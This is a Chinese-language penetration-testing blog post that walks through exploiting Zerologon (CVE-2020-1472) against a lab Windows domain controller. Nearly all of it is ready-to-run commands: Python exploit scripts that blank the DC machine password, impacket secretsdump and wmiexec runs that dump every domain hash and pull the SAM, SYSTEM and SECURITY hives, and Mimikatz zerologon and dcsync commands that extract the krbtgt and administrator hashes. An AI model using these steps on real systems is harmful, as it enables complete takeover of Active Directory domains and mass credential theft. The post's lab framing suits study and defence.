0x1 影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)


0x2 利用方式

对于此演示,域控制器 NetBios 名称为DC1,IP地址为 192.168.1.1,域为 secbook.nbfesec。
攻击机为 windows 7 可与域控通信,IP地址为 192.168.1.2。

67282-d2pz22io0yi.png

13969-qqhl6ylwe7l.png


2.1 Python 脚本复现

Github 克隆脚本并安装相关模块。

git clone https://github.com/mstxq17/cve-2020-1472.git
pip3 install -r requirements.txt

验证是否存在该漏洞。

python3 zerologon_tester.py DC1 192.168.1.1

16449-x5tos7b7vgq.png

将域控机器密码置空。

python3 cve-2020-1472-exploit.py DC1 192.168.1.1

29691-xll6dok15g.png

Tips: 如果执行出现上面错误,说明是impacket模块出现了问题,尝试卸载掉impacket模块,在github安装最新版。

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket && pip3 install .

28366-n4gj8m3no6.png

65262-ipb2o1zlxhg.png

使用 impacket secretsdump 转储存储在 ntds 中的凭据。

python3 secretsdump.py secbook.nbfesec/DC1$@192.168.1.1 -no-pass -just-dc

94723-vgdgpjfi8ja.png

可以看到已经导出了所有用户(包括域管理员)的哈希,而 DC1$ 的哈希(:31d6cfe0d16ae931b73c59d7e0c089c0)为空。

59464-ft20s9abx0h.png

恢复 DC1 机器密码通过之前获得管理员的哈希,从 DC1 下载 SAM。

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:340c1f48f24a17efb92f00e104fa14d5 secbook/Administrator@192.168.1.1

71150-d4i2ldczv5s.png

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

26680-mla42fx3c9q.png

从本地下载的文件获取密码。

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

18023-pv9bkqqj3fr.png

恢复 ntds 中的密码,避免在执行攻击后域控制器的功能出现问题。

python3 restorepassword.py secbook.nbfesec/DC1@DC1 -target-ip 192.168.1.1 -hexpass 34d90330152fd0d358ec59c0df72f1e5ae717346791a2c46821b7cf9fbf6a8a24044f27d23ba249e29ede6e7fc0e4c191d9c18c06ffe2e94a99409d56124efb9257baf8f2b788767275b04a57f3577d799e1502798ed7e2686fa78d0b8963592f3190207be3db7eca1a77a848e95f0dad6e030640418eaf80fdf5932d74931c99051470947c17dae14e8a429a270af8bc623249a7f9c45457f5c750d364783ed723e58a84b09f58ae05dbdcb0e7c274cedd269e7e4f339bd47758b04562641e41f6419dedc6463fa5241802990b0d22938a939747f0f6aa8049ea9fffbfd6af0d30b7920b8367f420118e267201eadf7

85765-kofgz8lc1l.png

检查还原是否成功。

python3 secretsdump.py secbook.nbfesec/DC1$@192.168.1.1 -no-pass -just-dc

16308-wbm2ets2ks.png


2.2 Mimikatz 利用

下载最新版 Mimikatz。

Mimikatz:https://github.com/gentilkiwi/mimikatz/releases

使用 Mimikatz 验证是否存在该漏洞。

mimikatz.exe "lsadump::zerologon /target:DC1.secbook.nbfesec /account:DC1$" "exit"

76544-vcdg1ka1f4l.png

使用 Mimikatz 利用该漏洞将域控机器密码置空。

mimikatz.exe "lsadump::zerologon /target:DC1.secbook.nbfesec /account:DC1$ /exploit" "exit"

53331-i5fa8mkcl1f.png

尝试使用空密码登录域管。

mimikatz.exe "lsadump::dcsync /domain:secbook.nbfesec /dc:DC1.secbook.nbfesec /user:krbtgt /authuser:DC1$ /authdomain:secbook.nbfesec /authpassword:\"\" /authntlm" "exit"

51697-pueqeggnurd.png

导出域控制器administrator管理员用户的ntlm hash。

mimikatz.exe "lsadump::dcsync /domain:secbook.nbfesec /dc:DC1.secbook.nbfesec /user:administrator /authuser:DC1$ /authdomain:secbook.nbfesec /authpassword: /authntlm" "exit"

73430-ub77t8bl8hd.png

Mimikatz 恢复机器密码默认为 Waza1234/Waza1234/Waza1234。

mimikatz.exe "lsadump::postzerologon /target:secbook.nbfesec /account:DC1$" "exit"

21641-351xboctdk6.png


参考:
https://nv2lt.github.io/windows/CVE-2020-1472-Step-by-Step-Procedure/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/
https://mp.weixin.qq.com/s/G_umJghOS4DXBNEhkDYeWg
https://github.com/mstxq17/cve-2020-1472
https://github.com/SecureAuthCorp/impacket
https://adsecurity.org/?p=483

标签: 内网渗透

仅有一条评论

  1. 漂亮妹妹

    哥哥 带带妹妹吧

添加新评论